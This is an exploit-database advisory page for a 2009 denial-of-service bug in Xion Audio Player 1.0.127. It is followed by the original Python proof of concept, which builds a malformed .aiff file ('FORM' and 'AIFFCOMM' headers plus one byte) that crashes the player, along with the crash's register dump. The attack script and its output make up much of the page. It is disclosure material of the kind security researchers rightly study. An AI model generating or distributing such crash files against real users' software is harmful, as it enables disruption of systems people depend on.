Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability

vendor:

Xion Audio Player

by:

condis

7,5

CVSS

HIGH

Denial of Service

399

CWE

Product Name: Xion Audio Player

Affected Version From: 1.0.127

Affected Version To: 1.0.127

Patch Exists: YES

Related CWE: N/A

CPE: a:xion_audio_player:xion_audio_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 Professional PL

2009

Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability

Xion Audio Player 1.0.127 is vulnerable to a denial of service attack when a malicious .aiff file is opened. The malicious file contains a FORM header followed by a AIFFCOMM header and an 'A' character. When the file is opened, the program crashes due to an access violation while writing to 00000020.

Mitigation:

Update to the latest version of Xion Audio Player.

Source

Exploit-DB raw data:

#!/usr/bin/python

# -------------------------------------------------------------------
# Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability
# found by condis
#
# Download  : http://xion.r2.com.au/index.php?page=download
# Tested on : Windows XP SP3 Professional PL
#
# Registers : 
#
# EAX 00000000
# ECX 02D0B488
# EDX 7C90E4F4 ntdll.KiFastSystemCallRet
# EBX 02D0B4F8
# ESP 02D0B4F8
# EBP 02D0CA60
# ESI 003D8D80
# EDI 00001A00
# EIP 11013C18 BASS.11013C18
#
# 11013C18   C740 20 01000000 MOV DWORD PTR DS:[EAX+20],1 <--- crash
#
# "Access Violation while writing to 00000020"
#
# I've also found this kind of bug while playing around with .flac 
# files so I think that handling all of the supported formats must be 
# really messed up :<
# --------------------------------------------------------------------

evil  = "FORM\x00\x00\x37\xA4AIFFCOMM"
evil += "A" # <--- crash (rest of the file doesn't matters)

aiff = open('xion-crash.aiff', 'w')
aiff.write(evil)
aiff.close()

print "Malicious .aiff file has been created. Enjoy"